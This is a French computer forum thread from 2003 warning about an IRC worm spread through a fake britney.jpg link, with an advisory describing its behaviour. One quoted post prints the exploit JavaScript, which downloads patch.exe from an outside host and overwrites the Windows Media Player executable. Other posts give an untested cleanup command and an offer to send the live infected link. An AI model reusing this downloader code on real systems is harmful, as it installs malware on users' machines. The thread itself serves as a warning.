Communauté Informatique NDFR.net : Ne jouez pas avec Britney - Actualité
Reply
Ne jouez pas avec Britney
Thread Tools Display Modes
  #1  
Old 27-10-2003, 13:01
Cougar's Avatar
Cougar Cougar is offline
Membre senior
 
Join Date: 16-09-2001
Location: Orléans
Age: 39
Posts: 3,850
Send a message via MSN to Cougar
Ne jouez pas avec Britney

Lien direct de la news : Ne jouez pas avec Britney
Depuis hier, un nouveau virus se propage sur le Net via le réseau IRC en exploitant les failles d'Internet Explorer et de Windows Media Player.

Derrière le lien attirant du type http://www..../britney.jpg se dissimule un ver très puissant qui aura vite fait de s'introduire dans votre ordinateur.

Très rapidement, le virus s'attaque à votre base de registre, empêchant l'exécution des programmes, et modifie le script.ini de votre client IRC pour diffuser le lien sur vos chans de discussions (http://www.angelfire.com/celeb2/---/britney.jpg <- uuh, check it out !! ).

Pour l'instant, aucun antivirus ne semble être en mesure de détecter le virus, en effet, votre serviteur Formatman, qui a testé pour vous ce virus, a vu son Norton 2004 s'étaler misérablement en une dizaine de minutes (AVP et McAfee sont aussi impuissants).

La seule solution existante pour le moment est de réinstaller Windows après avoir formaté le disque dur système.

Pour des informations plus techniques, rendez-vous ici.
__________________
Reply With Quote
  #2  
Old 27-10-2003, 14:20
dredgerman69's Avatar
dredgerman69 dredgerman69 is offline
Membre senior
 
Join Date: 20-10-2002
Location: Lyon
Age: 37
Posts: 304
Send a message via MSN to dredgerman69
Re: Ne jouez pas avec Britney

Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici
Reply With Quote
  #3  
Old 27-10-2003, 14:33
1for-matik's Avatar
1for-matik 1for-matik is offline
W32.Boulet.Worm Eraser
 
Join Date: 05-10-2003
Location: Au Pays de la choucroute
Age: 41
Posts: 3,841
Send a message via ICQ to 1for-matik Send a message via AIM to 1for-matik Send a message via Yahoo to 1for-matik Send a message via Skype™ to 1for-matik
Re: Ne jouez pas avec Britney

Quote:
Originally Posted by dredgerman69
Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici
G peur :confused: !
Norton n'a même pas encor publié son patch :confused:
__________________
Des problèmes ? Le chat NDFR est disponible. Des problèmes pour y accéder ? Voici le tuto.
Le Best Of "QUOTES" du chan IRC: C'est par ici


Sur n'1fo[r-matik]
: Astuce : Activer le bloqueur de pub/tracking natif sur Firefox


Last edited by 1for-matik; 27-04-2016 at 17:17.
Reply With Quote
  #4  
Old 27-10-2003, 14:34
rog62's Avatar
rog62 rog62 is offline
Membre senior
 
Join Date: 16-11-2002
Location: Capitale du Condroz
Age: 61
Posts: 2,349
Send a message via MSN to rog62
Re: Ne jouez pas avec Britney

Quote:
Originally Posted by dredgerman69
Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici
Donc, si j'ai bien compris... il faut même se méfier de Minou...
__________________
Cordialement Rog62

"Comprenne qui pourra..."
Reply With Quote
  #5  
Old 27-10-2003, 14:40
Cougar's Avatar
Cougar Cougar is offline
Membre senior
 
Join Date: 16-09-2001
Location: Orléans
Age: 39
Posts: 3,850
Send a message via MSN to Cougar
Re: Ne jouez pas avec Britney

ben le lien http://charmy.tky.hut.fi/brit.txt ne contient aucun virus/ver/...

Aussi bien benjy, formatman et moi n'avons eu aucun problèmes en allant sur ce lien.

voilà ce qu'il contient :
Quote:
2003-10-26 15:15 (+0200)DO NOT CLICK ON britney.jpg!!!Under no circumstances open an URL that ends with britney.jpg. It is actuallyan Internet Explorer / Windows Media Player exploit, as shown below.-----var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);location.href = "mms://";-----patch.exe seems to be compressed with UPX, interesting strings can be found within.0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!This is a command it sends automatically to mIRC. This causes mIRC to send theexploit URL to all channels you are in.It will replace/delete Windows system files. If that happens, you might get amessage of this sort: "Files that are required for Windows to run properly havebeen replaced by unrecognized versions".This is NOT the same thing as http://koti.phnet.fi/jonninen/mircwo...tny.txt.15:30: At this time I don't know if the worm can be removed. If it manages to deleteyour Windows system files, you'll have to reinstall Windows.15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit theyare hosting.16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) inEFnet.According to reports, simply "repairing" the Windows install or copying the deletedfiles back isn't enough, since the virus also messes around with the Windows registry.You'll have to reinstall Windows.16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. 16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.17:00: There's a list of Windows system files in the uncompressed version of patch.exestarting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,userinit.exe, services.exe, etc. There are also references to some anti-virus andfirewall programs in the immediate vicinity. The virus probably disables theseprograms so that it can roam freely.Reports say that the virus does not affect Windows 98, but it definitely affectsat least Windows 2000 and XP. Anti-virus software does not help you at this point,since none of them recognize the virus yet.The scavenger.sharewith.us site has been disabled. This prevents the virus frominfecting machines for now, but the Angelfire page is still up and the author ofthe virus could modify the page to point to another location.The IE exploit: http://www.security.nnov.ru/search/d...cid=510217:30: The virus might not affect Windows Media Player version 8. (seehttp://www.kb.cert.org/vuls/id/222044)19:10: According to reports, the virus does affect WMP 8 as well. Better not openany suspicious links as long as you use IE.2003-10-26 19:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.
__________________
Reply With Quote
  #6  
Old 27-10-2003, 14:47
Benjy's Avatar
Benjy Benjy is offline
Administrateur
 
Join Date: 21-08-2001
Location: Rueil Malmaison (92)
Age: 43
Posts: 2,043
Send a message via MSN to Benjy
Re: Ne jouez pas avec Britney

C'est parce que ton antivirus s'affole à cause de l'extrait de code VB.
__________________
Merci de lire et de respecter les règles et d'utiliser la .
Reply With Quote
  #7  
Old 27-10-2003, 16:41
dredgerman69's Avatar
dredgerman69 dredgerman69 is offline
Membre senior
 
Join Date: 20-10-2002
Location: Lyon
Age: 37
Posts: 304
Send a message via MSN to dredgerman69
Re: Ne jouez pas avec Britney

Ben Surment mais comme ça ça prouve que mon Pc est ultra securisé contre les virus et les cheveaux de troie
Reply With Quote
  #8  
Old 27-10-2003, 17:36
ThOMaZ2118's Avatar
ThOMaZ2118 ThOMaZ2118 is offline
Assassination Enthousiast
 
Join Date: 27-05-2003
Location: HQ CIA, Langley, Viginia, United States
Age: 40
Posts: 299
Send a message via MSN to ThOMaZ2118
Re: Ne jouez pas avec Britney

si vous l'avez vous n'etes pas encore obligé deformatter...
Cette ligne de texte dans votre client IRC devrai aussi pouvoir le suprimer (je n'ai pas tester):
//unload -rs script.ini | write -c script.ini | remove script.ini | run command.com /c attrib.exe -r mirc.ini | ignore -r

et le programme ici aussi (non plus pas testé): http://dronehunt.jbdesign.net/clean/spydll-clean.exe

J'espere que ca poura aider qq1
Reply With Quote
  #9  
Old 27-10-2003, 18:08
Cougar's Avatar
Cougar Cougar is offline
Membre senior
 
Join Date: 16-09-2001
Location: Orléans
Age: 39
Posts: 3,850
Send a message via MSN to Cougar
Re: Ne jouez pas avec Britney

ben j'ai plusieurs copains qui ont testé le spydll-clean.exe sans succès.

dredgerman69, si tu veux je t'envoie le link en pv pour tester ta sécurité
__________________
Reply With Quote
  #10  
Old 28-10-2003, 03:54
traducman traducman is offline
Membre
 
Join Date: 21-10-2003
Posts: 75
Re: Ne jouez pas avec Britney

Quote:
http://www.symantec.com/avcenter/venc/data/irc.trojan.fgt.html
! mettez à jour NAV !
Quote:
http://securityresponse.symantec.com/avcenter/download/pages/FR-N95.html
Reply With Quote
  #11  
Old 28-10-2003, 09:08
Werner's Avatar
Werner Werner is offline
cOWboy attitUDe
 
Join Date: 15-09-2001
Location: Stuttgart
Age: 45
Posts: 2,961
Re: Ne jouez pas avec Britney

Ah c'est pas trop tôt mieux vos tard que jamais comme on dit

Enfin ils ont été mauvais sur ce coup car ils l'ont découvert que dimanche alors que ce virus traîne depuis vendredi (voir même avant).
Reply With Quote
  #12  
Old 28-10-2003, 13:10
LeMoi's Avatar
LeMoi LeMoi is offline
ou LM
 
Join Date: 20-10-2002
Location: 37°1
Age: 39
Posts: 5,847
Send a message via ICQ to LeMoi Send a message via AIM to LeMoi Send a message via MSN to LeMoi Send a message via Yahoo to LeMoi Send a message via Skype™ to LeMoi
Re: Ne jouez pas avec Britney

bah au contraire, de dimanche à vendredi, c'est plutot pas mal...
sinon, comment qu'on le chope ce virus ? formatman l'a fait exprès ou bien l'a vraiment eu ? et a-t-il vraiment formatté lui aussi (D'après son pseudo, ça changerait pas trop de sa routine ?
__________________
[01mai2004@11:23:54] <@Kaspof> je garderais toujours un souvenir impérissable de toi LeMoi|Vacances
Ne soyez pas un boulet !
Reply With Quote
  #13  
Old 28-10-2003, 14:40
Fred's Avatar
Fred Fred is offline
00 Agent
 
Join Date: 19-10-2002
Location: MI6 HQ
Age: 40
Posts: 2,452
Send a message via MSN to Fred
Re: Ne jouez pas avec Britney

Ils disent qu'il exploite une faille IE/MediaPlayer : est-ce que ca signifie que nous sommes protégé avec les dernières maj IE ou Microsoft va-t-il sortir un nouveau patch ?

Ca me fait penser qu'une nouvelle MAJ DVD MediaPlayer vient de sortir -> direction WU
__________________
Eh y'a une grenouill' sur le bureau !!!
... non Gaston y'a pas d'grenouille sur le bureau
Eh y'a un gorille devant la porte !!!
... non Gaston y'a pas de gorille devant la porte
Weua y'a un p'tit oiseau sur la table !!!
... non Gaston

Last edited by Fred; 28-10-2003 at 14:57.
Reply With Quote
  #14  
Old 28-10-2003, 15:26
Werner's Avatar
Werner Werner is offline
cOWboy attitUDe
 
Join Date: 15-09-2001
Location: Stuttgart
Age: 45
Posts: 2,961
Re: Ne jouez pas avec Britney

Oui j'ai fais exprès de me le chopper j'avais mon DVDR avec l'image du système qui était prêt et comme je voulais tout rebalancer ça tombait bien.

Donc le Cougar me donne le lien, avant je regarde Windows Update et les maj de Norton et rien. Donc en gros j'étais parfaitement à jour et tout le système est parti en miette en quelques minutes ça prouve une nouvelle fois que les antivirus ne servent à rien car aujourd'hui vous avez peut-être la mise à jour pour ce virus mais demain vous ne l'aurez peut-être pas à temps.

Je me suis passé pdt de longue année d'antivirus car c'est cher et ça consomme des ressources inutilement (même au boulot on en avait un à une époque et maintenant plus aucun ). Le meilleur antivirus c'est de ne pas cliquer n'importe où et de faire attention aux mails.
Reply With Quote
  #15  
Old 28-10-2003, 17:30
LeMoi's Avatar
LeMoi LeMoi is offline
ou LM
 
Join Date: 20-10-2002
Location: 37°1
Age: 39
Posts: 5,847
Send a message via ICQ to LeMoi Send a message via AIM to LeMoi Send a message via MSN to LeMoi Send a message via Yahoo to LeMoi Send a message via Skype™ to LeMoi
Re: Ne jouez pas avec Britney

Quote:
Originally Posted by Formatman
Le meilleur antivirus c'est de ne pas cliquer n'importe où et de faire attention aux mails.
Exactement, c'est le meilleur moyen c'est pour ça que j'en ai pas, ni mm de firewall
__________________
[01mai2004@11:23:54] <@Kaspof> je garderais toujours un souvenir impérissable de toi LeMoi|Vacances
Ne soyez pas un boulet !
Reply With Quote
Reply

Bookmarks


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Cours de français Benjy Discussions sur le site et/ou le forum 47 01-05-2006 15:47
Test du routeur (WGT624v2) et de la carte PCMCIA (WG511T) Wifi Netgear Fred Articles 42 31-08-2004 17:44
Comparatif des gestionnaires de téléchargement Kaspof Articles 106 27-02-2004 16:03
Premiers pas sous Linux Fred Articles 19 21-10-2003 06:46
Probleme de Raid avec MSI K7T266 Pro2 RU Lionel-78 Windows NT4/2000/XP Client 0 03-04-2003 13:01

All times are GMT +2. The time now is 10:56.

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.